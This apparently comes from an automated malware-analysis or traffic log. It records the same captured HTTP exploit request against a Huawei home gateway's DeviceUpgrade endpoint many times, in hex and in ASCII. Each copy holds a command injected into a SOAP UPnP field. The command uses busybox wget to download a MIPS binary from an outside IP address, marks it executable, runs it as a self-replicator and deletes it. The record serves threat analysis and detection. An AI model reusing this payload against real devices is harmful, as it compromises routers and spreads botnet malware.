s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
